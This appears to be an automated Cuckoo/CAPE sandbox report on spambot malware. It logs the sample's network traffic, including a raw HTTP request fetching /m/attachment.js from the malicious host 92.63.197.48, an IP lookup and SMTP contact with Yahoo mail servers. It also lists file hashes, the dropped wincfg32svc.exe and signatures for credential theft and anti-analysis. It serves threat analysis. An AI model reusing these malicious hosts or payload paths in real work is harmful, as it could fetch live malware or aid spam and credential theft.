Y 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States
N 147.75.40.2 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49170 147.75.40.2 icanhazip.com 80
192.168.35.21 49169 92.63.197.48 80
192.168.35.21 49171 92.63.197.48 80
192.168.35.21 49172 92.63.197.48 80
192.168.35.21 49173 92.63.197.48 80
192.168.35.21 49174 92.63.197.48 80
192.168.35.21 49175 92.63.197.48 80
192.168.35.21 49176 92.63.197.48 80
192.168.35.21 49177 92.63.197.48 80
192.168.35.21 49178 92.63.197.48 80
192.168.35.21 49179 92.63.197.48 80
192.168.35.21 49180 92.63.197.48 80
192.168.35.21 49168 98.136.101.117 mta5.am0.yahoodns.net 25

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
yahoo.com [VT] MX mta5.am0.yahoodns.net [VT]
MX mta7.am0.yahoodns.net [VT]
MX mta6.am0.yahoodns.net [VT]
mta5.am0.yahoodns.net [VT] A 66.218.85.139 [VT]
A 74.6.137.64 [VT]
A 98.136.101.117 [VT]
A 67.195.228.141 [VT]
A 67.195.229.59 [VT]
A 98.137.159.24 [VT]
A 98.137.159.28 [VT]
A 66.218.85.52 [VT]
icanhazip.com [VT] A 147.75.40.2 [VT]

HTTP Requests

URI Data
http://92.63.197.48/m/attachment.js
GET /m/attachment.js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://icanhazip.com/
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: icanhazip.com

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name wincfg32svc.exe
Associated Filenames
C:\Windows\750547060050\wincfg32svc.exe
File Size 159744 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 34a7433231c49fa349f75da7426ed65f
SHA1 72ebb653a8e3bccc4f019e2f5fbff5c8bb4e49ad
SHA256 4b9d5841d38b8658466dcaf409c34c0f6d2d1f9ecb64254391a4621465daf79b
CRC32 10875687
Ssdeep 1536:iUWCvW0XOVwp8OOzn5As9IQsOo1oUHnyoHOvM3D/ozfKiQUS80I8z57jQDzEBCq4:bW2WUOWG/z5ARQGrHbXUS7z57Co/Hg
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
Sorry! No CAPE files.
Process Name 2019-01-08-spambot-malware.exe
PID 2924
Dump Size 27136 bytes
Module Path C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe
Type PE image: 32-bit executable
MD5 391dc54d66fdb1d9053c8e19d5a51483
SHA1 e3a18c085546573e4b8c8ba5a4424022d200ce28
SHA256 d780b3dd859388a0860d0eb5434569e75bca093ca162c071eb0dcb26cd834673
CRC32 01110BEF
Ssdeep 384:wPmHqQZyZzxTu4plLFhYZmt/x155ePWSG20F:hgZ9acjh+yX554820
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename d780b3dd859388a0860d0eb5434569e75bca093ca162c071eb0dcb26cd834673
Download
Process Name wincfg32svc.exe
PID 2688
Dump Size 27136 bytes
Module Path C:\Windows\750547060050\wincfg32svc.exe
Type PE image: 32-bit executable
MD5 7518c6611326eadaf498c85bdb38fcb5
SHA1 d8c9f041e972509f5b6c3663c5807abdd52f7f26
SHA256 7db853e3588b40b0f2ebe2e8484ea2e73a924c6319cdada42a344d79b88e9f31
CRC32 3AEB226D
Ssdeep 384:wPmHqQZyZzxTu4plLFhYZmt/x155ePWSG2FFF:hgZ9acjh+yX55482b
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 7db853e3588b40b0f2ebe2e8484ea2e73a924c6319cdada42a344d79b88e9f31
Download

Comments



No comments posted

Processing ( 47.961 seconds )

  • 45.872 BehaviorAnalysis
  • 0.706 Static
  • 0.644 CAPE
  • 0.206 Dropped
  • 0.206 TargetInfo
  • 0.15 ProcDump
  • 0.093 TrID
  • 0.033 Deduplicate
  • 0.032 NetworkAnalysis
  • 0.013 Strings
  • 0.004 AnalysisInfo
  • 0.001 Debug
  • 0.001 config_decoder

Signatures ( 21.844 seconds )

  • 4.894 antivm_generic_disk
  • 3.384 bootkit
  • 2.221 mimics_filetime
  • 1.798 decoy_document
  • 1.779 virus
  • 1.697 reads_self
  • 1.673 stealth_file
  • 1.536 hancitor_behavior
  • 1.535 api_spamming
  • 1.273 stealth_timeout
  • 0.009 antiav_detectreg
  • 0.004 persistence_autorun
  • 0.004 infostealer_ftp
  • 0.004 ransomware_files
  • 0.003 antiav_detectfile
  • 0.003 ransomware_extensions
  • 0.002 kovter_behavior
  • 0.002 antianalysis_detectreg
  • 0.002 modify_proxy
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.002 infostealer_mail
  • 0.001 tinba_behavior
  • 0.001 malicious_dynamic_function_loading
  • 0.001 rat_nanocore
  • 0.001 antiemu_wine_func
  • 0.001 infostealer_browser_password
  • 0.001 dynamic_function_loading
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway

Reporting ( 0.013 seconds )

  • 0.012 SubmitCAPE
  • 0.001 CompressResults
Task ID 29474
Mongo ID 5c369db4f28488708c44d989
Cuckoo release 1.3-CAPE
Delete